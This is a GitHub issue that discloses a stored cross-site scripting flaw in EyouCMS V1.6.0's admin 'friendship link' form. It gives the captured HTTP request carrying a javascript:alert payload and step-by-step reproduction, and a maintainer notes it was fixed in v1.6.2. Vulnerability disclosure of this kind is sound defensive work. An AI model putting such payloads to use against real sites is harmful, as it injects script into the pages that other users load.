Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
name:EyouCMS version: EyouCMS-V1.6.0-UTF8-SP1 Installation package download:
Problematic packets:
POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1 Host: 192.168.23.130:49160 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 141 Origin: http://192.168.23.130:49160 Connection: close Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload= typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=
POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1 Host: 192.168.23.130:49160 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 141 Origin: http://192.168.23.130:49160 Connection: close Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload=
typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=
Vulnerability recurrence
1.Log in to the background,Click "SEO module" ->"friendship link" ->"add link"
2.input payload:javascript:alert(11),Submit Click and trigger XSS after submission
PS:The vulnerability will also be displayed on the home page and can be triggered by clicking
The text was updated successfully, but these errors were encountered:
已修复,在v1.6.2版本发布
Sorry, something went wrong.
No branches or pull requests
name:EyouCMS

version: EyouCMS-V1.6.0-UTF8-SP1
Installation package download:
Problematic packets:
Vulnerability recurrence
1.Log in to the background,Click "SEO module" ->"friendship link" ->"add link"

2.input payload:javascript:alert(11),Submit



Click and trigger XSS after submission
PS:The vulnerability will also be displayed on the home page and can be triggered by clicking


The text was updated successfully, but these errors were encountered: